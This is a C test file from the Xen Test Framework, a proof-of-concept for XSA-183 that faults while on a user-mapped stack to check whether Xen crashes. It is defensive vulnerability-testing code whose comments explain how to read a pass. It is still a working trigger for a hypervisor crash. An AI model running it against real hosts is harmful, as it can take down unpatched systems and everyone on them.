Xen Test Framework: tests/xsa-183/main.c
#include <xtf.h>
const
char
test_title
[] =
"XSA-183 PoC"
;
/*
 * XSA-183 check: provoke a fault while the stack pointer refers to
 * user_stack, then report success if execution continues past the asm block.
 *
 * Takes no arguments and returns nothing; the outcome is reported through
 * xtf_success().
 *
 * NOTE(review): user_stack is defined in setup.c (not shown here); it is
 * presumably mapped user-accessible, so that delivering the fault makes the
 * hypervisor touch a user page.  Confirm against the XSA-183 advisory.
 *
 * Reading the result: reaching xtf_success() does not by itself show that the
 * fix is applied.  The same result is produced on hardware without SMAP and
 * on a host with SMAP disabled, so the host's SMAP state has to be checked
 * separately before treating a pass as evidence of a patched Xen.
 */
void test_main(void)
{
    unsigned long saved_sp, scratch;

    /* With a NULL selector in %fs, the %fs-relative read below must fault. */
    write_fs(0);

    asm volatile (
        /*
         * Set EFLAGS.AC to whitelist user accesses.  This keeps the test
         * itself from crashing if Xen leaks SMAP into guest context.
         * %c[AC] emits the bare constant; the template supplies the '$'.
         */
        "pushf;"
        "orl $%c[AC], (%%esp);"
        "popf;"

        /* Record the current stack pointer, then switch to the user stack. */
        "mov %%esp, %[curr_stk];"
        "mov %[user_stk], %%esp;"

        /*
         * Read offset 0 through the NULL selector to cause the fault.  The
         * exception table entry names label 1 as the faulting instruction
         * and label 2 as the fixup, so execution resumes after the read.
         */
        "1: mov %%fs:0, %[tmp]; 2:"
        _ASM_EXTABLE(1b, 2b)

        /* Return to the stack recorded above. */
        "mov %[curr_stk], %%esp;"

        /*
         * curr_stk is early-clobber ("=&r") because it is written before the
         * user_stk input is consumed; the two must not share a register.
         */
        : [curr_stk] "=&r" (saved_sp),
          [tmp]      "=r"  (scratch)
        : [user_stk] "r" (&user_stack[PAGE_SIZE]),
          [AC]       "i" (X86_EFLAGS_AC)
    );

    /*
     * Getting here means Xen did not crash: the hardware has no SMAP, SMAP
     * is disabled, or Xen carries the fix.  In each case Xen is not
     * vulnerable to XSA-183 as currently configured.
     */
    xtf_success("Xen is not vulnerable to XSA-183\n");
}

/*
 * Local variables:
 * mode: C
 * c-file-style: "BSD"
 * c-basic-offset: 4
 * tab-width: 4
 * indent-tabs-mode: nil
 * End:
 */
write_fs
static void write_fs(unsigned int fs)
Definition:
lib.h:196
user_stack
uint8_t user_stack[PAGE_SIZE]
Definition:
setup.c:22
test_main
void test_main(void)
To be implemented by each test, as its entry point.
Definition:
main.c:110
test_title
const char test_title[]
The title of the test.
Definition:
main.c:24
_ASM_EXTABLE
#define _ASM_EXTABLE(fault, fixup)
Create an exception table entry.
Definition:
extable.h:50
PAGE_SIZE
#define PAGE_SIZE
Definition:
page.h:11
X86_EFLAGS_AC
#define X86_EFLAGS_AC
Definition:
processor.h:21
xtf_success
void xtf_success(const char *fmt,...)
Report test success.
Definition:
report.c:38